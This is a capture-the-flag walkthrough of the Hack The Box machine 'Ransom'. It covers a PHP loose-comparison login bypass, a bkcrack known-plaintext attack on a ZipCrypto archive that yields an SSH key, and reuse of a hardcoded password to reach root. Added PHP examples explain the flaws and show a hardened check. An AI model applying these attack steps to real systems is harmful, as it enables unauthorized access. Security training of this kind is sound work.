# Enumeration
#### nmap
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_  256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Admin - HTML5 Admin Template
|_Requested resource was http://10.10.11.153/login
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
# Authentication Bypass
Inspecting the login request shows that the form sends a GET request to `api/login`. Changing the method to POST changes both the error message and the body of the response.
Sending the GET request with a JSON body (`Content-Type: application/json`) of
`{"password":true}` returns a login success. Reloading the page then logs you in.
# Reverse shell
There are two files: a zip archive and the user.txt flag.
The zip is password protected, so I am brute-forcing it:
```
┌──(root💀kali)-[~/Downloads]
└─# zip2john uploaded-file-3422.zip > zip.uploaded
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bash_logout PKZIP Encr: 2b chk, TS_chk, cmplen=170, decmplen=220, crc=6CE3189B
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bashrc PKZIP Encr: 2b chk, TS_chk, cmplen=1752, decmplen=3771, crc=AB254644
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.profile PKZIP Encr: 2b chk, TS_chk, cmplen=404, decmplen=807, crc=D1B22A87
ver 1.0 uploaded-file-3422.zip/.cache/ is not encrypted, or stored with non-handled compression type
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.cache/motd.legal-displayed PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.sudo_as_admin_successful PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 uploaded-file-3422.zip/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1990, decmplen=2610, crc=38804579
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/authorized_keys PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa.pub PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.viminfo PKZIP Encr: 2b chk, TS_chk, cmplen=581, decmplen=2009, crc=396B04B4
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(root💀kali)-[~/Downloads]
└─# john --format=pkzip zip.uploaded
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
```
The brute-force attack was unsuccessful. I found this post on Medium:
https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a87 and, as it describes, 7z can be used to extract a lot of information about the archive's contents:
```
┌──(root💀kali)-[~/Downloads]
└─# 7z l -slt uploaded-file-3422.zip|less
Path = .bash_logout
Folder = -
Size = 220
Packed Size = 170
Modified = 2020-02-25 08:03:22
Created =
Accessed =
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = 6CE3189B
Method = ZipCrypto Deflate
Host OS = Unix
Version = 20
Volume Index = 0
```
The encryption method is ZipCrypto, and the integrity check stored for each entry is a CRC-32. The attack used here only works against ZipCrypto. It is a known-plaintext attack: find a local file whose contents are identical to any file in the archive, use it to recover the archive's internal keys, and with those keys decrypt the entire archive and potentially even recover the password.
First I compare two files, one from my local Kali machine and one from the archive, by their CRC-32. In this case I am comparing .bash_logout because that file is rarely changed, and the local copy is 220 bytes, the same size as the entry in the archive.
```
┌──(root💀kali)-[~/Downloads]
└─# python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import binascii
>>> with open('/home/kali/.bash_logout', 'rb') as f:
...     data = f.read()
...
>>> data
b'# ~/.bash_logout: executed by bash(1) when login shell exits.\n\n# when leaving the console clear the screen to increase privacy\n\nif [ "$SHLVL" = 1 ]; then\n [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q\nfi\n'
>>> hex(binascii.crc32(data) & 0xFFFFFFFF)
'0x6ce3189b'
>>>
```
The CRC-32 of the two files is exactly the same, 0x6ce3189b, so the local file can serve as known plaintext for the archive entry.
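The manual check above compares one local file against one archive entry. The following PHP script, an added example that is not part of the writeup, generalises it: it reads the CRC-32 and uncompressed size of every entry from the archive's central directory (both are stored in the clear even when the data is ZipCrypto-encrypted) and reports which local candidate files are byte-identical to an entry. That is exactly the known-plaintext precondition bkcrack needs, and from a defender's side it shows why zipping stock dotfiles next to a private key gives the encryption very little to protect. The demo archive, file names and contents are constructed here; the archive is written unencrypted because the CRC and size fields are identical either way.

```php
<?php
// Added example, not code from the writeup or from bkcrack.
// Match local candidate files against archive entries by (size, CRC-32).

function crc32_hex(string $data): string {
    // crc32() is signed on 32-bit PHP builds; mask to the unsigned 32-bit value.
    return sprintf('%08x', crc32($data) & 0xFFFFFFFF);
}

/**
 * Return [entry name => candidate path] for every archive entry whose
 * uncompressed size and CRC-32 equal those of a candidate file.
 */
function find_known_plaintext(string $archivePath, array $candidatePaths): array {
    $zip = new ZipArchive();
    if ($zip->open($archivePath) !== true) {
        throw new RuntimeException("cannot open archive: $archivePath");
    }

    // Index candidates by "size:crc" so each archive entry costs one lookup.
    $index = [];
    foreach ($candidatePaths as $path) {
        $data = file_get_contents($path);
        $index[strlen($data) . ':' . crc32_hex($data)] = $path;
    }

    $matches = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $st = $zip->statIndex($i);
        // Skip directories and empty entries: a zero-length entry has CRC 0
        // and would "match" any empty candidate without proving anything.
        if ($st === false || $st['size'] === 0) {
            continue;
        }
        $key = $st['size'] . ':' . sprintf('%08x', $st['crc'] & 0xFFFFFFFF);
        if (isset($index[$key])) {
            $matches[$st['name']] = $index[$key];
        }
    }
    $zip->close();
    return $matches;
}

// --- Constructed demo archive and candidate files (not the box's files) ---
$dir = sys_get_temp_dir() . '/known-plaintext-demo-' . getmypid();
mkdir($dir);

$stockLogout = "# ~/.bash_logout: constructed stand-in for the stock file\nclear\n";
$editedRc    = "# .bashrc edited by the user, so no stock copy will match it\n";
$secretKey   = "-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed, not a real key\n";

$archive = "$dir/uploaded-file.zip";
$zip = new ZipArchive();
$zip->open($archive, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$zip->addFromString('.bash_logout', $stockLogout);
$zip->addFromString('.bashrc', $editedRc);
$zip->addFromString('.ssh/id_rsa', $secretKey);
$zip->close();

// Local candidates: a byte-identical .bash_logout and an unrelated .bashrc.
file_put_contents("$dir/bash_logout", $stockLogout);
file_put_contents("$dir/bashrc", "# a different local .bashrc\n");

$matches = find_known_plaintext($archive, ["$dir/bash_logout", "$dir/bashrc"]);
foreach ($matches as $entry => $candidate) {
    echo "$entry is byte-identical to $candidate\n";
}
if ($matches === []) {
    echo "no known plaintext found\n";
}
```

Only `.bash_logout` is reported: `.bashrc` differs from the local copy, and `.ssh/id_rsa` has no candidate at all. A single matched entry is enough for the bkcrack steps that follow, because ZipCrypto uses the same three internal keys for every entry in an archive that shares one password.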
1. Make a copy of your local .bash_logout:
```
┌──(root💀kali)-[/home/kali]
└─# cp .bash_logout bash_logout
```
2. Zip the copy under the name plain.zip:
```
┌──(root💀kali)-[/home/kali]
└─# zip plain.zip bash_logout
  adding: bash_logout (deflated 28%)
```
3. Use bkcrack to retrieve the keys:
```
┌──(root💀kali)-[/home/kali]
└─# /opt/bkcrack/install/bkcrack -C ~/Downloads/uploaded-file-3422.zip -c .bash_logout -P plain.zip -p bash_logout
bkcrack 1.3.5 - 2022-03-23
[11:10:29] Z reduction using 150 bytes of known plaintext
100.0 % (150 / 150)
[11:10:30] Attack on 57097 Z values at index 7
Keys: 7b549874 ebc25ec5 7e465e18
78.6 % (44881 / 57097)
[11:11:54] Keys
7b549874 ebc25ec5 7e465e18
```
4. Use bkcrack with the retrieved keys to write a copy of the protected zip with a new password:
```
┌──(root💀kali)-[/home/kali]
└─# /opt/bkcrack/install/bkcrack -C ~/Downloads/uploaded-file-3422.zip -k 7b549874 ebc25ec5 7e465e18 -U new-pass-file.zip 1234
bkcrack 1.3.5 - 2022-03-23
[11:15:30] Writing unlocked archive new-pass-file.zip with password "1234"
100.0 % (9 / 9)
Wrote unlocked archive.
```
5. Unzip the new file with the new password:
```
┌──(root💀kali)-[/home/kali]
└─# unzip new-pass-file.zip
Archive:  new-pass-file.zip
[new-pass-file.zip] .bash_logout password:
replace .bash_logout? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: .bash_logout
replace .bashrc? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: .bashrc
replace .profile? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: .profile
 extracting: .cache/motd.legal-displayed
 extracting: .sudo_as_admin_successful
   creating: .ssh/
  inflating: .ssh/id_rsa
  inflating: .ssh/authorized_keys
  inflating: .ssh/id_rsa.pub
  inflating: .viminfo
```
SSH in with the extracted id_rsa key as user htb (the htb username is visible in id_rsa.pub).
# Privesc
```
╔══════════╣ Searching passwords in config PHP files
'password' => 'P@ssw0rd1!',

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb 7 13:33 /usr/bin/su
-rwsr-xr-x 1 root root 55K Feb 7 13:33 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Feb 7 13:33 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 31K Feb 21 12:58 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
Vulnerable to CVE-2021-3560
```
Because the website takes the password from the request and compares it locally, the comparison (and possibly a log of failed attempts) should exist somewhere in the web root, so I searched for the "Invalid Password" error string:
```
htb@ransom:~$ cd /srv/prod
htb@ransom:/srv/prod$ grep -r "Invalid Password"
app/Http/Controllers/AuthController.php:        return "Invalid Password";
```
Next I analyse AuthController.php:
```
htb@ransom:/srv/prod$ cat app/Http/Controllers/AuthController.php
[....snip.....]
        if ($request->get('password') == "UHC-March-Global-PW!") {
            session(['loggedin' => True]);
            return "Login Successful";
        }
        return "Invalid Password";
    }
```
The password is UHC-March-Global-PW!, and this comparison also explains the earlier bypass: PHP's loose `==` converts the string operand to a boolean when the other operand is a boolean, so `true == "UHC-March-Global-PW!"` evaluates to true and the JSON body `{"password":true}` passes the check. The same password works for root:
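Both the Authentication Bypass section and the AuthController.php snippet above come down to one PHP comparison. The script below is an added example, not the box's AuthController, that puts the loose check next to a strict one and feeds both the same decoded JSON bodies; the password constant is a placeholder, not the box's real value.

```php
<?php
// Added example, not code from the target application.
// Placeholder secret; the real application would load this from config.
const EXPECTED_PASSWORD = 'placeholder-real-password';

// Vulnerable form, mirroring the controller above: with == PHP converts the
// string to bool when the other operand is bool, so any non-empty string
// compares equal to true and a JSON body of {"password":true} is accepted.
function login_loose($password): string {
    if ($password == EXPECTED_PASSWORD) {
        return "Login Successful";
    }
    return "Invalid Password";
}

// Hardened form: refuse anything that is not a string, then compare with
// hash_equals(), which is type-strict and runs in constant time.
function login_strict($password): string {
    if (!is_string($password)) {
        return "Invalid Password";
    }
    if (hash_equals(EXPECTED_PASSWORD, $password)) {
        return "Login Successful";
    }
    return "Invalid Password";
}

// Constructed request bodies, decoded the way a JSON request body would be.
$bodies = [
    '{"password":true}',
    '{"password":"wrong"}',
    '{"password":"placeholder-real-password"}',
];

foreach ($bodies as $json) {
    $password = json_decode($json, true)['password'];
    printf("%-42s loose: %-16s strict: %s\n",
        $json, login_loose($password), login_strict($password));
}
```

Running it shows the first body accepted by `login_loose` and rejected by `login_strict`, while the correct string password passes both. The `is_string()` guard matters as much as the operator: a framework that decodes JSON will hand the controller booleans, integers and arrays, and every comparison against a secret should reject those before it compares anything.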
```
htb@ransom:/srv/prod$ su root
Password:
root@ransom:/srv/prod# whoami
root
```